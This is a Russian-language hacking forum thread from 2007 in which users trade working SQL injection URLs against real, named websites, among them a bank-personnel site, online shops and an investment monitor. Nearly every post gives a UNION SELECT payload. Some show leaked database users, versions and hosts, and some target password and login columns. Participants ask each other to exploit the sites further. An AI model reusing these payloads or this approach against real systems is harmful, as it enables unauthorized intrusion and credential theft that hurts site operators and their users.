 |
|
02.10.2007, 01:07
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Сообщение от Tyc00n
Раскрутите)
Код:
http://www.schleuderwelt.com/print.php?printpage='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
код:
http://www.schleuderwelt.com/print.php?printpage=-9999999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,concat_ws(0x3a,version(),user( ),database()),21,22,23,24,25,26,27/*
Дальше сам ройся,я спать... 
|
|
|
02.10.2007, 15:07
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Секас 
Код:
http://www.lovemagia.ru/product_show.php?lid= 7&sid=-20+union+s elect+1/*
Версия - 4.0.26-log
|
|
|
|
02.10.2007, 21:27
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
http://www.bankpersonal.dp.ua
код:
http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(table_name,0x3a,column_ name),4+from+information_schema.columns/*
код:
http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat_ws(0x3a,passw,login,nam e,id),4+from+job_catvip/* <--- это единственное интересное что я нашел,
а вот в этой ---> http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(0x3a,passw,login,name,i d),4+from+bank_kiev.auth/* почему-то нет вывода 
первый раз вижу вывод в такой форме 
код:
http://www.profnavigator.ru/tmpl2.php?PN=doct.php&dout=text&dsubj=22&dtype=4&n id=-1608+union+select+concat_ws(0x3a,version(),user(), database()),2/* кто нить встречал такое???
Последний раз редактировалось fobofob; 02.10.2007 в 22:10..
|
|
|
|
03.10.2007, 00:47
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Мну непонял чо сервак от него хочед! Вот вам на растерзание
PHP+MSSQL
http://www.super.md/?t=statall&id=0&time=3+OR+1=@@version--
Ошибка выполнения SQL запроса: statsGeneral 0xce8add383ab3a840178eb487785dc2f6,0,3 OR 1=@@version--,NULL,1,4096
|
|
|
|
03.10.2007, 08:54
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
|
|
|
|
03.10.2007, 13:01
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
_http://www.nikita.ru/javagames/index.php?wrub=-422+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(), 0x71),0x71),3,4,5/*
|
|
|
|
03.10.2007, 17:30
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
www.softprom.com
Код:
http://www.softprom.com/products.phtml?subcategory_id=-71'+union+select+user(),2/*
user: root@localhost.rm1.softprom.ua
|
|
|
|
03.10.2007, 21:15
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
С нами:
10787308
Репутация:
409
|
|
Сообщение от Calcutta
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
сам же вывел версию ветки..откуда здесь information_schema.tables
|
|
|
|
04.10.2007, 13:03
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
То есть ты просто заменил ключевые слова языка SQL на CHAR(...)?  ))) Жесть... Так нельзя делать! На то они и ключевые слова языка, они не могут быть заменены ничем, ни возвращаемым значением функции, ни значаением возвращаемым подзапросом и т.д. Он тебе лепит ошибку только потому, что у тебя ошибка в синтаксисе запроса. Если парсятся ключевые слова в параметре, то тут уже ты ничего не сделаешь. Получатся некие пасхальные яйца от la2.acrossworld.ru - вроде как инъекция есть, но реализовать её нельзя. |
|
|
|
04.10.2007, 15:05
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Код:
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,concat(user(),0x3a,version(), 0x3a,database()),6,7,8/*
xxx@88.214.192.26:4.0.26:evro
Код:
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,5,concat(login,0x3a, mail),7,8+from+users/*
Код:
http://www.salecap.com/order.php?action=buy&id=-1+union+select+1,concat(user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8/*
sale34re_dblogin@localhost:4.0.27-standard-log:sal
Код:
http://www.denezhki.com/ShowArticle.php?id=-1+union+select+1,2,concat(user(),0x3a,ve rsion(),0x3a,database()),4/*
rublikicom@81.177.16.131:4.1.21:rublikicom_den
Код:
http://www.duniacyber.com/advertises_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user(),0x3a,ve rsion(),0x3a,database()),14,1 5,16,17,18/*
cyber_admin@localhost:4.0.27-standard:cyber_dccsql |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?473672){kind=avatar}
Линейный вид
